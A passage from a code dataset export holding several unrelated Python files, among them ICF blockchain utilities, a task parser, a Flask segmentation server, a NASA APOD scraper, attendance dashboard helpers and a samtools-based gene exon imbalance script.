time.sleep(random.randint(31,33))","sub_path":"file2/pachong.py","file_name":"pachong.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"169231121","text":"\"\"\"\nutilities to help traverse the ICF blockchain with Python\n\n\n\"\"\"\nimport sys\nimport json\nimport os\ntry:\n    from . import versions\nexcept ImportError:\n    import versions\nimport itertools\n\n\n\"\"\" constants used below \"\"\"\nHASH = 'Hash' # key in the blockchain file's JSON object\nINHERITANCE = 'Inheritance' # key in the blockchain's JSON object\nFINGER_FILENAME = \"fingerprint.txt\" # the name of the fingerprint files\nTIMESTAMP = 'Timestamp' # the time stamp in the blockchain's JSON object\nICF_BLOCK_FILENAME = \"icfblock.block\" # the name of the blockchain files\nMETA_DIR = 'meta' # name of the \"meta\" directory\nDATA_DIR = 'data' # name of the \"data\" directory\n\nICF_TEST_DIR = os.path.join(\"ICF\", \"TEST\")\nICF_PROD_DIR = os.path.join(\"ICF\", \"PROD\")\nTEST = 'TEST'\nPROD = 'PROD'\n\n\ndef version_path_to_blockfile(version_path):\n    \"\"\" given a path to a work product version directory, return\n    the path to the icf blockfile \"\"\"\n    return os.path.join(version_path, META_DIR, ICF_BLOCK_FILENAME)\n\ndef get_dirs(start_path):\n    \"\"\" get a list of the directories in a path\"\"\"\n    return list(a[0] for a in os.walk(start_path))\n\nclass Connection:\n    \"\"\"\n    a connection between two objects. 
Useful in building\n a force diagram in D3\n\n this relates a source to a target\n\n \"\"\"\n def __init__(self, source, target, value=1):\n self.source = source\n self.target = target\n self.value = value\n\n def __str__(self):\n return \"Connection(source={}, target={}, value={})\".format(\n self.source, self.target, self.value)\n \n def as_dict(self):\n return {\n \"source\":self.source, \n \"target\":self.target, \"value\":self.value}\n\ndef check_against_prod_path(in_path):\n \"\"\" if possible, swap TEST path for PROD\"\"\"\n if(ICF_TEST_DIR in in_path):\n prod = in_path.replace(\n ICF_TEST_DIR, ICF_PROD_DIR)\n if os.path.exists(prod):\n return prod\n return in_path \n\ndef check_against_test_path(in_path):\n \"\"\" if possible, swap PROD path for TEST\"\"\"\n if(ICF_PROD_DIR in in_path):\n test = in_path.replace(\n ICF_PROD_DIR, ICF_TEST_DIR)\n if os.path.exists(test):\n return test\n return in_path \n\nclass Block:\n \"\"\" represents a \"block\" in the blockchain \n \n \n corresponds to the contents of an ICF_BLOCK_FILENAME file\n\n\n the path is the path to the physical ICF blockchain file\n \"\"\"\n def __init__(self, path, hashkey, inheritance=[], timestamp=None):\n self.path = path\n self.hashkey = hashkey \n self.inheritance = inheritance \n self.timestamp = timestamp\n\n @classmethod\n def from_path(cls, filepath, rootpath=\"\"):\n \"\"\" read a block from the blockchain\n \n will first check if the QA version exists and will return that\n otherwise, will return the test version\n \n \"\"\"\n filepath = check_against_prod_path(filepath)\n\n with open(filepath, 'r') as f:\n d = json.load(f)\n p = []\n rootpath = os.path.dirname(filepath)\n\n\n for path in d[INHERITANCE]:\n\n path = check_against_prod_path(\n os.path.join(rootpath, path))\n p.append(cls.from_path(path))\n timestamp = d.get(TIMESTAMP, None) \n\n return cls(os.path.abspath(filepath), d[HASH].strip(), p,\n timestamp\n )\n\n def __itr_nodes(self,):\n \"\"\"returns an iterator over nodes\n \n note nodes is not unique because there may be\n multiple references to a node in the chain.\n\n use self.nodes() to get a unique list of nodes instead\n \"\"\"\n yield self.path\n for node in self.inheritance:\n yield from node.__itr_nodes()\n\n @property \n def nodes(self):\n \"\"\" obtain a list of all the [unique] nodes in the blockchain \"\"\"\n return list(set(self.__itr_nodes()))\n\n def __itr_connections(self, ):\n \"\"\" returns an iterator over connections\"\"\"\n for node in self.inheritance:\n yield Connection(source=self.path, target=node.path)\n yield from node.__itr_connections()\n\n @property \n def connections(self):\n \"\"\" obtain a list of all the connections in the blockchain \"\"\"\n return list(self.__itr_connections())\n\n def __str__(self):\n if(len(self.inheritance)>0):\n return \"[{}:{}]\".format(self.path,\n \" \".join(map(str, self.inheritance)))\n return \"[{}]\".format(self.path) \n\n\ndef get_fingerprint(filepath, sep=\"\\t\"):\n \"\"\"\n read the fingerprint from a valid fingerprint file\n\n \"\"\"\n with open(filepath, 'r') as f:\n lines = f.readlines()\n fingerline = lines[1]\n if \"Total\" not in fingerline:\n raise ValueError(\"Invalid fingerprint file\")\n return fingerline.split(sep)[1].strip() \n\ndef get_version(meta_folder_path):\n \"\"\" given a path to a meta folder, get the version number \"\"\"\n vstr = os.path.split(meta_folder_path)\n return versions.parse_version_str(vstr[-1])\n\n\ndef version_has_block(version_path):\n vp = os.path.abspath(version_path)\n return 
os.path.exists(os.path.join(vp, \n META_DIR, ICF_BLOCK_FILENAME))\n\nclass WorkProducts:\n \"\"\"\n represents all the work products in an ICF data structure\n\n path is the directory where work products are listed as\n folders\n\n this should be something like\n ...\\ICF\\Test\\\n or ...\\ICF\\Prod\\\n \"\"\"\n def __init__(self, path):\n self.path = path\n\n @property\n def all(self):\n l = lambda x: WorkProduct(x)\n paths = [os.path.abspath(os.path.join(self.path, i))\n for i in os.listdir(self.path)]\n return list(map(l, paths)) \n\n def __iter__(self):\n yield from self.all\n\n\nclass WorkProductVersion:\n \"\"\"\n Represents a particular version of a work product.\n\n This corresponds to an commited ICF work product.\n\n self.path should be the path to the version directory\n i.e\n\n ICF/{Test or Prod}/workproduct/\n /v1.2/ <--- this is \"path\" in constructor \n /data\n [data files go here]\n /meta\n [meta files go here, blockchain and fingerprint]\n \"\"\"\n def __init__(self, path):\n path = check_against_prod_path(path)\n if(ICF_TEST_DIR.upper() in path.upper())>0:\n self._QA = TEST\n elif(ICF_PROD_DIR.upper() in path.upper())>0:\n self._QA = PROD\n else:\n raise ValueError(\"'{}' Is not a valid ICF Path\".format(path))\n self.path = path\n\n @property\n def qa_status(self):\n return self._QA\n\n def __eq__(self, other):\n if (other.fingerprint==self.fingerprint):\n if(other.version_number==self.version_number):\n return True\n return False \n\n @property\n def other_versions_path(self):\n \"\"\" return path folder containing other versions of this\n work product version\n \"\"\"\n return os.path.abspath(os.path.join(self.path, \"..\"))\n\n @property\n def all_work_products_path(self):\n \"\"\"return path of folder containing ICF data structure\n (the \"work products\" directory)\n \"\"\"\n return check_against_test_path(\n os.path.abspath(os.path.join(\n self.other_versions_path, \"..\")))\n\n @property\n def meta_path(self):\n return os.path.join(self.path, META_DIR)\n \n @property\n def data_path(self):\n return os.path.join(self.PATH, DATA_DIR)\n\n @property\n def fingerprint_path(self):\n return os.path.join(self.meta_path, FINGER_FILENAME)\n\n @property\n def work_product_path(self):\n wpp, version = os.path.split(self.path)\n return wpp\n\n @property\n def block_path(self):\n return os.path.join(self.meta_path, ICF_BLOCK_FILENAME)\n\n @property\n def timestamp(self):\n return self.block.timestamp\n\n @property\n def version_number(self):\n return get_version(self.path)\n\n @property\n def version_str(self):\n return os.path.split(self.path)[-1]\n\n @property\n def fingerprint(self):\n return get_fingerprint(self.fingerprint_path)\n\n @property\n def block(self):\n \"\"\" obtain a Block instance from this version \"\"\"\n return Block.from_path(self.block_path)\n\n @property\n def work_product_name(self):\n return os.path.split(self.work_product_path)[1]\n\n @classmethod\n def from_block(cls, block):\n blockpath, blockfile = os.path.split(os.path.abspath(block.path))\n version_path, metadir = os.path.split(blockpath)\n return cls(version_path)\n\n def short_desc(self):\n outstr = \"{}\\t{}\\t{}\\t{}\".format(\n self.work_product_name,\n self.version_str, self.path, self.qa_status)\n return outstr\n\n def get_summary(self, sep=\" \"):\n block = self.block\n s = []\n for node in block.nodes:\n parent = WorkProductVersion.from_block(Block.from_path(node))\n s.append(sep.join([\n parent.work_product_name, parent.version_str, parent.path,\n parent.qa_status\n ]\n ))\n return 
\"\\n\".join(s)\n\n @classmethod\n def explain_version(cls, path):\n c = cls(path)\n outstr = \"Summary of '{}':\\n\\tQA Status = {}\\n{}\".format(\n path, c.qa_status, c.get_summary('\\t'))\n\n return outstr\n\n def _get_children_paths(self):\n \"\"\"\n traverse the directory structure and identify other\n work product versions which reference this one in\n their inheritance.\n \"\"\"\n all_products_path = self.all_work_products_path\n block_path = self.block.path\n work_products = WorkProducts(all_products_path)\n\n def temp(item):\n return item\n \n _versions = [[i.path for i in work_product.versions\n if (block_path in i.block.nodes)]\n for work_product in work_products]\n\n # remove \"this\" from the children and make a flat list \n x = list(set(itertools.chain(*\n [i for i in _versions if os.path.abspath(\n self.path)\n not in i]\n )))\n return x\n @property\n def children(self):\n return [WorkProductVersion(i) for i in self._get_children_paths()]\n\n @property\n def parents(self):\n items = [WorkProductVersion.from_block(Block.from_path(i))\n for i in self.block.nodes]\n # remove 'self' from the list of parents\n return [i for i in items if i !=self]\n\n\nclass WorkProduct:\n \"\"\"\n Represents an ICF Work Product. This is a class of work\n performed as part of the CA or CIE;\n\n Actual ICF work products correspond to WorkProductVersion\n instances. This class represents the collection of work\n product verions\n\n\n \"\"\"\n def __init__(self, path):\n if os.path.isdir(path):\n self.path = path\n return\n raise ValueError(\"'{}' is not a valid path\".format(path))\n\n def __str__(self, ):\n return os.path.split(self.path)[1]\n\n @property\n def versions(self, ):\n return [WorkProductVersion(\n os.path.abspath(os.path.join(self.path, version)))\n for version in os.listdir(self.path)\n if version_has_block(os.path.join(self.path, version))\n ]\n\n @property\n def most_recent_version(self, ):\n vlist = [(v.version_number, v) for v in self.versions]\n out = sorted(vlist, key=lambda x: x[0])\n try:\n return out[0][1]\n except IndexError:\n return None\n\n","sub_path":"pylib/backbone/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":11994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"389039185","text":"import datetime\nimport re\n\nimport source\nimport util\n\n\nclass Task(source.SourceLine):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._parse_source()\n\n @property\n def name(self):\n if not self.parent:\n return 'root'\n else:\n return self._parsed_source['name']\n\n @name.setter\n def name(self, name):\n self._set_source(name=name)\n\n # TODO: remove 'completed', pull apart into 'completed_self' and 'completed_defacto' or similar\n\n @property\n def completed_self(self):\n return self._parsed_source['completed']\n\n @property\n def completed_above(self):\n return self.completed_self or self.parent and self.parent.completed_above\n\n @property\n def completed_below(self):\n return self.completed_self or self.children and all(t.completed_below for t in self.children)\n\n @property\n def completed(self):\n return self.completed_above or self.completed_below\n\n @completed.setter\n def completed(self, completed):\n self._set_source(completed=completed)\n\n @property\n def weight(self):\n parsed_weight = self._parsed_source['weight']\n if parsed_weight is None:\n return 1\n else:\n return parsed_weight\n\n @weight.setter\n def weight(self, weight):\n 
self._set_source(weight=weight)\n\n    @property\n    def due_date(self):\n        due_date = self._parsed_source['due_date']\n        if due_date is None and self.parent:\n            return self.parent.due_date\n        else:\n            return due_date\n\n    @due_date.setter\n    def due_date(self, due_date):\n        self._set_source(due_date=due_date)\n\n    @property\n    def overdue(self):\n        due_date_passed = self.due_date and self.due_date < datetime.datetime.today().date()\n        return not self.completed and due_date_passed\n\n    @property\n    def description(self):\n        return self._parsed_source['description']\n\n    @description.setter\n    def description(self, description):\n        self._set_source(description=description)\n\n    @property\n    def _parsed_source(self):\n        if not hasattr(self, '_attrs'):\n            self._parse_source()\n        return self._attrs\n\n    def _parse_source(self):\n        self._attrs = {}\n        self._attrs['name'] = _TAG_PATTERN.sub(\n            '', self.value.lstrip('*').strip())\n        self._attrs['completed'] = self.value.startswith('*')\n\n        for tag_type in _TAG_TYPE_PATTERNS:\n            self._attrs[tag_type] = None\n        for tag in _TAG_PATTERN.findall(self.value):\n            for tag_type, (pattern, cons) in _TAG_TYPE_PATTERNS.items():\n                if pattern.match(tag):\n                    self._attrs[tag_type] = cons(tag)\n                    break\n\n    def _set_source(self, **kwargs):\n        attrs = {**self._parsed_source, **kwargs}\n        source_value = ''\n        if attrs['completed']:\n            source_value += '* '\n        tags = ['weight', 'due_date', 'description']\n        tag_strs = [\n            f'[{attrs[tag]}]' for tag in tags if attrs[tag] is not None]\n        source_value += attrs['name']\n        source_value += ' '.join(tag_strs)\n        self.value = source_value\n        self._attrs = attrs\n\n    def path(self, root=None, include_root=False):\n        if self == root or self.parent is None:\n            return [self] if include_root else []\n        else:\n            return self.parent.path(root, include_root) + [self]\n\n    def depth(self, root=None, include_root=False):\n        return len(self.path(root, include_root)) - 1\n\n    def list(self, include_self=False):\n        start = [self] if include_self else []\n        return start + util.flatten(t.list(True) for t in self.children)\n\n    @property\n    def progress(self):\n        if self.completed:\n            return 1.0\n        elif self.children:\n            weight_total = sum(t.weight for t in self.children)\n            weight_completed = sum(\n                t.weight * t.progress for t in self.children)\n            return weight_completed / weight_total\n        else:\n            return 0.0\n    \n    def __eq__(self, other):\n        if not isinstance(other, Task):\n            return NotImplemented\n        return hash(self) == hash(other)\n\n    def __hash__(self):\n        return hash(self.value)\n\n    def __repr__(self):\n        if self.children:\n            return f\"<'{self.name}':[{','.join(map(str, self.children))}]>\"\n        else:\n            return f\"'{self.name}'\"\n\n\ndef _parse_date(tag):\n    return datetime.datetime.strptime(tag, '%d/%m/%y').date()\n\n\ndef _parse_weight(tag):\n    try:\n        return int(tag)\n    except:\n        w = float(tag)\n        if w.is_integer():\n            return int(w)\n        else:\n            return w\n\n\n_TAG_PATTERN = re.compile(r'\\[(.*?)\\]\\s?')\n_TAG_TYPE_PATTERNS = {\n    'weight': (re.compile(r'^\\d*\\.?\\d+$'), _parse_weight),\n    'due_date': (re.compile(r'^\\d+/\\d+/\\d+$'), _parse_date),\n    'description': (re.compile(r'^.+$'), str)\n}\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"609162815","text":"H, W, m = map(int, input().split())\nxs = [0] * H\nys = [0] * W\ns = set()\nfor _ in range(m):\n    h, w = map(int, input().split())\n    h -= 1\n    w -= 1\n    xs[h] += 1\n    ys[w] += 1\n    s.add((h, w))\n\nmx = max(xs)\nmy = 
max(ys)\nmxs = set()\nfor i in range(H):\n if xs[i] == mx:\n mxs.add(i)\nmys = set()\nfor i in range(W):\n if ys[i] == my:\n mys.add(i)\nfor x in mxs:\n for y in mys:\n if not (x, y) in s:\n print(mx + my)\n exit()\nprint(mx + my - 1)\n","sub_path":"python/abc176/e/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"240952415","text":"import os\nimport sys\n\nimport cv2\nimport numpy as np\nimport torch\nimport segmentation_models_pytorch as smp\nfrom torch.autograd import Variable\n\nROOT_DIR = os.path.abspath(os.path.join('..'))\nsys.path.append(ROOT_DIR)\n\nfrom flask import Flask, jsonify, make_response, send_file\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n# MODEL_PATH = os.path.join('models', 'celeba_mask_hq-psp-mobilenet_v2.pth')\nMODEL_PATH = os.path.join('models', 'celeba_mask_hq-psp-densenet121.pth')\n\nmodel = torch.load(MODEL_PATH, map_location=torch.device(DEVICE))\n\n# print(model)\nmodel.eval()\n\napp = Flask(__name__)\n\n\ndef blur(img_path):\n test_img = cv2.imread(img_path)\n test_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2RGB)\n test_img = torch.from_numpy(test_img).to(DEVICE)\n test_img = Variable(test_img.float())\n test_img = test_img.unsqueeze(0).permute((0, 3, 1, 2))\n\n out_name = os.path.join('assets', 'test_out.png')\n out_img = model.predict(test_img)\n out_img = np.argmax(out_img.squeeze().permute(1, 2, 0).cpu().numpy(), axis=2) * 60\n cv2.imwrite(out_name, out_img)\n\n return out_name\n\n\n# @app.route('/predict', methods=['POST'])\n@app.route('/predict')\ndef predict():\n print('predicting...')\n img_path = os.path.join('assets', 'images.jpg')\n print('predicting ended.')\n return send_file(blur(img_path), mimetype='image/png')\n # return response\n # return jsonify({'class_id': test_img})\n\n\nif __name__ == \"__main__\":\n app.run(\n host='0.0.0.0',\n port=2080,\n debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"42551605","text":"# From https://apod.nasa.gov/apod/archivepix.html follow each link, find the image in that link and download it\n\n# Need to research:\n# 1) Download something from the internet => urllib.request\n# 2) Interpret HTML to parse and find images => BeautifulSoup\nimport urllib.request\nfrom urllib.parse import urljoin\nfrom bs4 import BeautifulSoup\nimport os\n\n# Strategy\n# 1) Download the index from URL\nbase_url = \"https://apod.nasa.gov/apod/archivepix.html\"\ndownload_directory = \"apod_pictures\"\ncontent = urllib.request.urlopen(base_url).read()\n\n# Set a limit on number of entries, for debugging purposes.\ndebug = True\nlimit = 30\n\n# 2) For each link...\nfor link in BeautifulSoup(content, \"lxml\").findAll(\"a\"):\n href = urljoin(base_url, link[\"href\"])\n\n if debug and limit <= 0:\n break\n\n print(\"Following link:\", href)\n\n # ...follow the link and download the image on that linked page\n content = urllib.request.urlopen(href).read()\n for img in BeautifulSoup(content, \"lxml\").findAll(\"img\"):\n img_href = urljoin(href, img[\"src\"])\n\n print(\"Downloading:\", img_href)\n img_name = img_href.split(\"/\")[-1]\n urllib.request.urlretrieve(img_href, os.path.join(download_directory, img_name))\n\n if debug:\n limit -= 1\n if limit <= 0:\n 
break\n\n","sub_path":"intermediate_python_programming/nasa_apod/base_scraping.py","file_name":"base_scraping.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"402590216","text":"import pytz, jwt\nfrom datetime import datetime\nfrom calendar import monthrange\nfrom jaeger_client import Config\n\nbusmask_names = 'Mon Tue Wed Thu Fri'\nweekmask_names = 'Sat Sun'\n\nlocal = pytz.timezone(\"Asia/Jakarta\")\n\nmax_time_presence = datetime.strptime('07:30:59', '%H:%M:%S').time()\n\ndef keys_redis(user_id, key): return '%s-%s' % (user_id, key)\n\ndef parse_datetime(date):\n return datetime.strptime(date, '%Y-%m-%dT%H:%M:%SZ')\n\ndef last_day_of_month(date_value):\n return date_value.replace(day = monthrange(date_value.year, date_value.month)[1])\n\ndef arrayPresence(totalNoPresence=0,precentageNoPresence=0,totalPresence=0,precentagePresence=0,totalPresenceWeekend=0,precentagePresenceWeekend=0,totalLatePresence=0,precentageLatePresence=0):\n data = {\n 'total_no_presence': totalNoPresence,\n 'precentage_no_presence': precentageNoPresence,\n 'total_presence': totalPresence,\n 'precentage_already_presence': precentagePresence,\n 'total_weekend_presence': totalPresenceWeekend,\n 'precentage_weekend_presence': precentagePresenceWeekend,\n 'total_late_presence': totalLatePresence,\n 'precentage_late_presence': precentageLatePresence,\n }\n return data\n\ndef arrayPermit(permit=0, precentagePermit=0):\n data = {\n 'total_permit': permit,\n 'precentage_total_permit': precentagePermit,\n }\n return data\n\ndef arrayLocationUser(totalWfo=0,precentageWfo=0,totalWfh=0,precentageWfh=0,totalPerjadin=0,precentagePerjadin=0):\n data = {\n 'total_wfo': totalWfo,\n 'precentage_wfo': precentageWfo,\n 'total_wfh': totalWfh,\n 'precentage_wfh': precentageWfh,\n 'total_perjadin': totalPerjadin,\n 'precentage_perjadin': precentagePerjadin,\n }\n return data\n\ndef arrayReportUser(totalReportYear=0, totalReportMonth=0):\n data = {\n 'total_report_year': totalReportYear,\n 'total_report_month': totalReportMonth,\n }\n return data\n\ndef arrayOfficeHourUser(totalOfficeHourYear=0, totalOfficeHourMonth=0):\n data = {\n 'total_office_hour_year': round(totalOfficeHourYear, 2),\n 'total_office_hour_month': round(totalOfficeHourMonth, 2),\n }\n return data\n\ndef decode_auth_token(secret_key, auth_token):\n try:\n payload = jwt.decode(auth_token, secret_key)\n return payload\n except jwt.ExpiredSignatureError:\n return 401\n except jwt.InvalidTokenError:\n return 401\n\ndef config_jaeger(jaeger_host, jaeger_port):\n config = Config(\n config={ # usually read from some yaml config\n 'sampler': {\n 'type': 'const',\n 'param': 1,\n },\n 'local_agent': {\n 'reporting_host': jaeger_host,\n 'reporting_port': jaeger_port,\n },\n 'logging': True,\n },\n service_name='dashboard-attendance-user-api',\n validate=True,\n )\n return config\n ","sub_path":"service-python/dashboardUser/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"635898365","text":"\"\"\"\n\nYou are given a directed graph with N vertices.Each vertex of the given graph can have multiple incoming edges but it must have a single outgoing edge.\n\nIf the vertex doesnt have an outgoing edge then it is indicated with -1.Two vertices v1 and v2 are given in which the task is to find \n\nthe nearest meeting vertex of both vertices.(The nearest vertex that 
have path from both v1 and v2).If no such vertex exists print -1\n\nInput:\n\nFirstline consists of number of vertices v\nSecondline has an edge array in which vertex i points to vertex edge[i]\nNextline contains two vertices v1 and v2\n\nOutput:\n\nprint the nearest meeting vertex from v1 and v2\n\nExample 1:\n\nInput:\n\n5\n1 -1 1 2 3\n0 2\n\nOutput:\n\n1\n\nExample 2:\n\nInput:\n\n4\n2 -1 3 -1\n2 3\n\nOutput:\n \n 3\n\n\"\"\"\ndef addEdge(s,d,g):\n g[s]=d\ndef Dfsutil(g,c1,visited):\n visited[c1]=True\n while g[c1]!=-1 and g[c1]!=True:\n c1=g[c1]\n visited[c1]=True\n \ndef nearestMeeting(g,c1,c2):\n visited=[False]*len(g)\n Dfsutil(g,c1,visited)\n \n if visited[c2]==True:\n return c2\n while g[c2]!=-1 and g[c2]!=True:\n c2=g[c2]\n if visited[c2]==True:\n return c2\n return -1\n \n\nv=int(input())\ng=[-1]*v\ne=list(map(int,input().split()))\nfor i in range(len(e)):\n addEdge(i,e[i],g)\nc1,c2=map(int,input().split())\nprint(nearestMeeting(g,c1,c2))\n","sub_path":"nearestmeetingcell.py","file_name":"nearestmeetingcell.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"40917767","text":"\nimport subprocess\nimport sys\n\nbam_files = sys.argv[1:]\n\ngene_files = [\"ALK\", \"NRG1\", \"RET\", \"NTRK3\", \"ROS1\"]\noutfile = open(\"Results/RNA/Imbalance/imbalance_all_gene.txt\", \"w\")\noutfile2 = open(\"Results/RNA/Imbalance/imbalance_called_gene.txt\", \"w\")\noutfile.write(\"Sample\\tgene\\t3'/5'-ratio\\tCoverage\\tNorm_Coverage\\tImbalance\\n\")\noutfile2.write(\"Sample\\tgene\\t3'/5'-ratio\\tCoverage\\tNorm_Coverage\\n\")\n\nbam_dict = {}\nfor bam in bam_files :\n print(\"samtools idxstats \" + bam + \" | awk -F '\\t' '{s+=$3}END{print s}' > nr_reads.txt\")\n #subprocess.call(\"samtools index \" + bam, shell=True)\n subprocess.call(\"samtools idxstats \" + bam + \" | awk -F '\\t' '{s+=$3}END{print s}' > nr_reads.txt\", shell=True)\n nr_bam_file = open(\"nr_reads.txt\")\n nr_reads = 0\n for line in nr_bam_file :\n nr_reads = int(line.strip()) / 10000000.0\n bam_dict[bam] = nr_reads\n nr_bam_file.close()\n\nsubprocess.call(\"mkdir exon_coverage\", shell = True)\nexon_result_dict = {}\nfor bam in bam_files :\n exon_result_dict[bam] = {}\n print(bam)\n print(bam_dict[bam])\n #sample = bam.split(\"/\")[-1].split(\"Aligned\")[0]\n sample = bam.split(\"/\")[-1].split(\".bam\")[0]\n for gene in gene_files :\n exon_result_dict[bam][gene] = []\n print(gene)\n gene_file = open(\"DATA/\" + gene + \"_exons.txt\")\n exon_list = []\n for line in gene_file :\n lline = line.strip().split(\"\\t\")\n chrom = lline[0]\n start_pos = lline[1]\n end_pos = lline[2]\n exon = lline[3]\n exon_list.append([exon, chrom, start_pos, end_pos])\n #print(exon, chrom, start_pos, end_pos)\n print(\"samtools depth -d 100000 -aa -r \" + chrom + \":\" + str(start_pos) + \"-\" + str(end_pos) + \" \" + bam + \" > exon_coverage/\" + exon + \".txt\")\n subprocess.call(\"samtools depth -d 100000 -aa -r \" + chrom + \":\" + str(start_pos) + \"-\" + str(end_pos) + \" \" + bam + \" > exon_coverage/\" + exon + \".txt\", shell=True)\n exon_result_dict[bam][gene].append(exon_list)\n avg_depth_list = []\n i = 0\n for exon in exon_list :\n exon_file = open(\"exon_coverage/\" + exon[0] + \".txt\")\n avg_depth = 0\n nr_pos = 0\n for line in exon_file :\n lline = line.strip().split(\"\\t\")\n chrom = lline[0]\n pos = lline[1]\n avg_depth += int(lline[2])\n nr_pos += 1\n avg_depth /= float(nr_pos)\n avg_depth_list.append(avg_depth)\n 
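# The per-exon mean depth ends up in two places: the transient\n            # avg_depth_list used for the 3'/5' ratio below, and the exon entry\n            # itself (index 4 of [name, chrom, start, end]), which is how the\n            # per-exon report written at the end of the script reads it back\n            # as exon[4].\n            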
exon_result_dict[bam][gene][0][i].append(avg_depth)\n i += 1\n exon_file.close()\n\n outfile.write(sample + \"\\t\" + gene + \"\\t\")\n gene_start = 1\n gene_end = 1\n coverage = 0\n i = 0\n '''ALK'''\n if gene == \"ALK\" :\n for d in avg_depth_list :\n if i <= 7 :\n gene_start += d / bam_dict[bam]\n elif i >= 8 :\n gene_end += d / bam_dict[bam]\n if i >= 8 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 8.0\n gene_end /= 8.0\n coverage /= 8.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 35.0 and coverage > 1000.0 :\n #if imbalance > 25.0 and coverage > 40.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\n '''NRG1'''\n if gene == \"NRG1\" :\n for d in avg_depth_list :\n if i <= 7 :\n gene_start += d / bam_dict[bam]\n elif i >= 8 :\n gene_end += d / bam_dict[bam]\n if i >= 8 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 8.0\n gene_end /= 6.0\n coverage /= 6.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 1.0 and coverage > 0.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\n '''RET'''\n if gene == \"RET\" :\n for d in avg_depth_list :\n if i <= 8 :\n gene_start += d / bam_dict[bam]\n elif i >= 9 :\n gene_end += d / bam_dict[bam]\n if i >= 9 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 9.0\n gene_end /= 9.0\n coverage /= 9.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 3.0 and coverage > 500.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\n '''NTRK3'''\n if gene == \"NTRK3\" :\n for d in avg_depth_list :\n if i <= 7 :\n gene_start += d / bam_dict[bam]\n elif i >= 11 :\n gene_end += d / bam_dict[bam]\n if i >= 11 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 8.0\n gene_end /= 5.0\n coverage /= 5.0\n imbalance = gene_end / gene_start\n outfile.write(str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\t\")\n if imbalance > 1.0 and coverage > 200.0 :\n #if imbalance > 1.0 and coverage > 40.0 :\n outfile.write(\"Imbalance\" + \"\\n\")\n outfile2.write(sample + \"\\t\" + gene + \"\\t\" + str(round(imbalance,1)) + \"\\t\" + str(round(coverage*bam_dict[bam],1)) + \"\\t\" + str(round(coverage,1)) + \"\\n\")\n else :\n outfile.write(\"\" + \"\\n\")\n '''ROS1'''\n if gene == \"ROS1\" :\n for d in avg_depth_list :\n if i <= 6 :\n gene_start += d / bam_dict[bam]\n elif i >= 12 :\n gene_end += d / bam_dict[bam]\n if i >= 12 :\n coverage += d / bam_dict[bam]\n i += 1\n gene_start /= 7.0\n gene_end /= 7.0\n coverage /= 7.0\n imbalance = gene_end / gene_start\n 
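# The five per-gene branches differ only in the exon split point and\n            # the normalising divisors, so they could collapse into one helper.\n            # Sketch only -- the name and signature are illustrative, not part\n            # of this script:\n            #\n            #   def three_five_ratio(depths, n5, first_3p, d5, d3, norm):\n            #       start = (1 + sum(depths[:n5]) / norm) / d5\n            #       end = (1 + sum(depths[first_3p:]) / norm) / d3\n            #       return end / start\n            #\n            # For ROS1 this is three_five_ratio(avg_depth_list, 7, 12, 7.0,\n            # 7.0, bam_dict[bam]); the 1 + term mirrors gene_start and\n            # gene_end being initialised to 1 above, apparently as a\n            # divide-by-zero guard.\n            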
